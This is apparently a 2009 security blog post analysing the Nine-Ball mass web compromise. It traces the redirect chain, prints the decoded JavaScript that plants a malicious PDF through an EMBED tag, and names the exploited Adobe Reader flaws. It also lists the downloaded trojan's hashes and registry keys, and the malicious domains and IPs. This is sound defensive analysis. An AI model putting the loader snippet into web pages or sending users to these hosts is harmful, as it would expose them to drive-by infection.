Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php

Exploit Analysis

http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)

The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.

The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){
}
if (Qqz8W8MiQQlAc){
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);

The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.

ThreatExpert
VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The below table lists domain registration data for the domains hosted at 91.212.65.133:

Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...